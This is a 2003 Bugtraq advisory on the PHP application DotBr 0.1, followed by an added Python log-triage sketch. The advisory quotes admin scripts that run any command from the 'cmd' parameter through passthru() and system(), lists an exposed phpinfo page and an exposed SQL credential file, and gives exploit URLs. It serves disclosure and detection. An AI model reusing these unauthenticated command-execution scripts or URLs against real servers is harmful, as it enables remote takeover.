[28918] in bugtraq
DotBr (PHP)
daemon@ATHENA.MIT.EDU (Frog Man)
Tue Feb 18 11:01:41 2003
From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sat, 15 Feb 2003 10:55:19 +0100
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <F136NqFJ3sl3xbYiMCI00009935@hotmail.com>
Information :
°°°°°°°°°°°°°
Website : http://dotbr.org
Version : 0.1
Problems :
- phpinfo()
- Information disclosure
- System command execution
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
foo.php3 :
---------------------
<? phpinfo(); ?>
---------------------
config.inc :
- SQL password
- SQL host
- SQL username
- SQL DB name
admin/exec.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
if (!isset($sep)) {
$sep = "_";
}
$cmd=str_replace($sep," ",$cmd);
passthru($cmd,$ret);
echo $ret;
?>
</pre>
</body>
</html>
---------------------------------------
admin/system.php3 :
---------------------------------------
<html>
<body>
<pre>
<?
$cmd = str_replace("_"," ",$cmd);
system($cmd,$result);
echo "\n result == ". $result . "\n";
?>
</pre>
</body>
</html>
---------------------------------------
Exploits :
°°°°°°°°°°
http://[target]/foo.php3
http://[target]/config.inc
http://[target]/admin/exec.php3?cmd=[COMMAND]
http://[target]/admin/system.php3?cmd=[COMMAND]
More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/5holes8.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
http://www.phpsecure.org
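
Added example, not part of the original post or of DotBr: a log-triage sketch that flags requests to the four locations listed above and, for the two admin scripts, rebuilds the command the server ran by applying the same separator replacement the scripts apply. It assumes Apache common/combined access logs; the names triage, EXPOSED, EXEC and SAMPLE and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths named in the advisory, relative to the DotBr install directory.
EXPOSED = ("foo.php3", "config.inc")
# Command scripts; True means the script honours a caller-supplied $sep.
EXEC = {"admin/exec.php3": True, "admin/system.php3": False}

# Client, request target and status from a common/combined log format line.
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

def _hits(path, name):
    return path == name or path.endswith("/" + name)

def triage(line):
    """Return (client, status, finding, detail) for a DotBr-related request, else None."""
    m = REQ.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    url = urlsplit(target)
    path = url.path.lstrip("/")
    for name, honours_sep in EXEC.items():
        if _hits(path, name):
            q = parse_qs(url.query, keep_blank_values=True)
            cmd = q.get("cmd", [""])[0]
            # Mirror the scripts: exec.php3 swaps $sep (default "_"), system.php3 always "_".
            sep = q.get("sep", ["_"])[0] if honours_sep else "_"
            # PHP's str_replace leaves the string unchanged for an empty search value.
            detail = cmd.replace(sep, " ") if sep else cmd
            return client, status, "command-exec", detail
    for name in EXPOSED:
        if _hits(path, name):
            return client, status, "info-disclosure", name
    return None

# Constructed sample lines (documentation addresses, harmless commands).
SAMPLE = [
    '192.0.2.10 - - [18/Feb/2003:11:02:07 +0100] "GET /admin/exec.php3?cmd=uname_-a HTTP/1.0" 200 412',
    '192.0.2.10 - - [18/Feb/2003:11:02:31 +0100] "GET /dotbr/admin/exec.php3?sep=,&cmd=ls,-la HTTP/1.0" 200 958',
    '198.51.100.7 - - [18/Feb/2003:11:05:12 +0100] "GET /admin/system.php3?cmd=id HTTP/1.0" 200 97',
    '198.51.100.7 - - [18/Feb/2003:11:05:40 +0100] "GET /config.inc HTTP/1.0" 200 301',
    '203.0.113.5 - - [18/Feb/2003:11:06:02 +0100] "GET /index.php3 HTTP/1.0" 200 5120',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(triage(line))
```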